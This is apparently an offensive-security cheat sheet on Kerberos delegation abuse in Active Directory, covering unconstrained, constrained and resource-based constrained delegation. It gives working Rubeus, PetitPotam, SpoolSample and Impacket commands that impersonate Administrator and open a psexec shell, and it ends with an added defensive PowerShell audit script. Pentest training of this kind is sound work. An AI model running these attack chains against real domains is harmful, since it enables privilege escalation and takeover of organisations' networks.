Delegation Attacks
Kerberos delegation allows a service to impersonate a user to access other resources. Misconfigurations in delegation settings can lead to privilege escalation and lateral movement.
Unconstrained Delegation
Servers with Unconstrained Delegation enabled cache, in LSASS memory, the TGT of every user who authenticates to them over Kerberos (the TGT is forwarded inside the service ticket). If an attacker compromises such a server, they can extract these TGTs and reuse them as those users.
Discovery
Identify computers with Unconstrained Delegation enabled.
PowerView:
Get-DomainComputer -Unconstrained | Select-Object name,dnshostname
ActiveDirectory Module:
Get-ADComputer -Filter {TrustedForDelegation -eq $true}
Domain Controllers are trusted for unconstrained delegation by default, so they will appear in both result sets; the interesting findings are the non-DC hosts.
Exploitation
Coerce authentication from a high-value target (such as a Domain Controller) to the compromised server and monitor for the incoming TGT.
On the compromised server, run Rubeus to monitor for TGTs:
.\Rubeus.exe monitor /interval:5
Trigger authentication from the DC (PrinterBug):
SpoolSample.exe DC01.corp.local COMPROMISED_SERVER.corp.local
Or using PetitPotam:
python3 PetitPotam.py COMPROMISED_SERVER DC01.corp.local
Use the captured TGT:
.\Rubeus.exe ptt /ticket:BASE64_TICKET
Constrained Delegation
Constrained Delegation restricts which services (SPNs) an account can delegate to. However, if an attacker compromises an account configured for constrained delegation with protocol transition (TrustedToAuthForDelegation), they can impersonate *any* user to the allowed services, except accounts marked "Account is sensitive and cannot be delegated" or placed in the Protected Users group.
Discovery
Find users or computers trusted for constrained delegation.
Get-DomainUser -TrustedToAuth | Select-Object samaccountname,msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | Select-Object name,msds-allowedtodelegateto
Exploitation
Using the hash of the compromised service account, request a TGS for a high-privileged user (e.g., Administrator) to the allowed service.
Using Rubeus (with hash):
.\Rubeus.exe s4u /user:SERVICE_ACCOUNT /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/fileserver.corp.local /ptt
Using Impacket:
getST.py -spn cifs/fileserver.corp.local -impersonate Administrator corp.local/service_account:password
Alternative Service
If the allowed SPN is not the one you want (e.g., HTTP instead of CIFS) but it is on the same host, the service name in the request can often be changed: the service name is not part of the encrypted portion of the ticket, so the KDC does not bind the ticket to it.
Request to HTTP but use for CIFS on the same host:
getST.py -spn http/server.corp.local -impersonate Administrator corp.local/service_account:password -altservice cifs/server.corp.local
Resource-Based Constrained Delegation (RBCD)
RBCD is configured on the target object rather than the delegating object: the target's msDS-AllowedToActOnBehalfOfOtherIdentity attribute specifies who may delegate to it. An attacker with write access to a computer object can populate that attribute with an account they control and then obtain service tickets to the computer as a privileged user.
Prerequisites
1. Write access to the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
2. Control of an account with an SPN (a machine account works).
Check if you have write access:
Get-DomainComputer TARGET_SERVER | Select-Object -ExpandProperty ntsecuritydescriptor |
Select-Object -ExpandProperty Access | Where-Object {$_.IdentityReference -match "your_user"}
Exploitation Steps
Create a machine account (if needed), configure RBCD on the target, and then request a service ticket.
Create a machine account (if ms-DS-MachineAccountQuota > 0; the default is 10):
New-MachineAccount -MachineAccount YOURCOMPUTER -Password $(ConvertTo-SecureString 'Password123!' -AsPlainText -Force)
Or use Impacket:
addcomputer.py -computer-name YOURCOMPUTER -computer-pass 'Password123!' corp.local/user:password
Set RBCD on the target:
Set-ADComputer TARGET_SERVER -PrincipalsAllowedToDelegateToAccount YOURCOMPUTER$
Request a ticket using your machine account:
getST.py -spn cifs/TARGET_SERVER.corp.local -impersonate Administrator corp.local/YOURCOMPUTER$:'Password123!'
Use the ticket:
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@TARGET_SERVER.corp.local
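As an added, defender-side example that is not part of the original page: a PowerShell audit that lists the three delegation configurations discussed above (unconstrained, constrained with and without protocol transition, RBCD) together with the privileged accounts that remain delegatable. It assumes the ActiveDirectory RSAT module, read access to the domain, and a domain that has the Protected Users group; the "Finding" and "Detail" column names are my own.

```powershell
# Kerberos delegation audit (added example, not the page's own tooling).
# Assumes the ActiveDirectory module and read access to the directory.
Import-Module ActiveDirectory

# Domain Controllers are unconstrained by design; any other host is a finding.
$dcNames = (Get-ADDomainController -Filter *).Name

# 1. Unconstrained delegation on non-DC computers (these cache user TGTs).
$unconstrained = Get-ADComputer -Filter 'TrustedForDelegation -eq $true' |
    Where-Object { $dcNames -notcontains $_.Name } |
    ForEach-Object { [pscustomobject]@{ Finding = 'Unconstrained'; Object = $_.SamAccountName
        Detail = 'Remove "Trust this computer for delegation to any service"' } }

# 2. Classic constrained delegation. Protocol transition (userAccountControl bit
#    0x1000000, TRUSTED_TO_AUTH_FOR_DELEGATION) lets the account obtain tickets
#    for arbitrary users without their participation, so it is flagged separately.
$constrained = Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' `
        -Properties msDS-AllowedToDelegateTo, userAccountControl, sAMAccountName |
    ForEach-Object {
        $pt = ($_.userAccountControl -band 0x1000000) -ne 0
        [pscustomobject]@{
            Finding = if ($pt) { 'Constrained+ProtocolTransition' } else { 'Constrained' }
            Object  = $_.sAMAccountName
            Detail  = ($_.'msDS-AllowedToDelegateTo' -join ', ')
        }
    }

# 3. RBCD: computers whose msDS-AllowedToActOnBehalfOfOtherIdentity names a principal.
$rbcd = Get-ADComputer -Filter * -Properties PrincipalsAllowedToDelegateToAccount |
    Where-Object { $_.PrincipalsAllowedToDelegateToAccount } |
    ForEach-Object { [pscustomobject]@{ Finding = 'RBCD'; Object = $_.SamAccountName
        Detail = ($_.PrincipalsAllowedToDelegateToAccount -join ', ') } }

# 4. Domain Admins that can still be impersonated through delegation: neither
#    "Account is sensitive and cannot be delegated" nor a Protected Users member.
$protected = @(Get-ADGroupMember 'Protected Users' -Recursive |
    Select-Object -ExpandProperty SamAccountName)
$exposed = Get-ADGroupMember 'Domain Admins' -Recursive |
    Where-Object objectClass -eq 'user' |
    Get-ADUser -Properties AccountNotDelegated |
    Where-Object { -not $_.AccountNotDelegated -and $protected -notcontains $_.SamAccountName } |
    ForEach-Object { [pscustomobject]@{ Finding = 'DelegatableAdmin'; Object = $_.SamAccountName
        Detail = 'Set AccountNotDelegated or add to Protected Users' } }

@($unconstrained) + @($constrained) + @($rbcd) + @($exposed) | Format-Table -AutoSize
```

Every row maps to a concrete remediation: clear the delegation setting on the object, remove protocol transition where plain constrained delegation suffices, and move privileged accounts into Protected Users.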